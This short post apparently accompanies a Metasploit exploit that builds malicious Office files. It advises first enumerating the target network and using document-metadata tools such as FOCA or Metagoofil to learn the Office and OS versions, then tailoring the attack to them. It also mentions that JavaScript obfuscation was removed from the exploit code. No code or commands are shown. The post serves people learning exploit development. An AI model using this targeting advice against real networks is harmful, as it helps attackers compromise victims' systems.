This exploit should be done after the enumeration of the target network, preferably using metadata on documents using tools like FOCA or Metagoofil to detect the Office and OS to create the files and with this information target the attack.

UPDATE: HD Made some changes to the code removing the obfuscation since there appears to be some problems with encrypt_js and this specific exploit, either way I believe that the code description is useful for anyone looking at learning how to write exploit in Metasploit.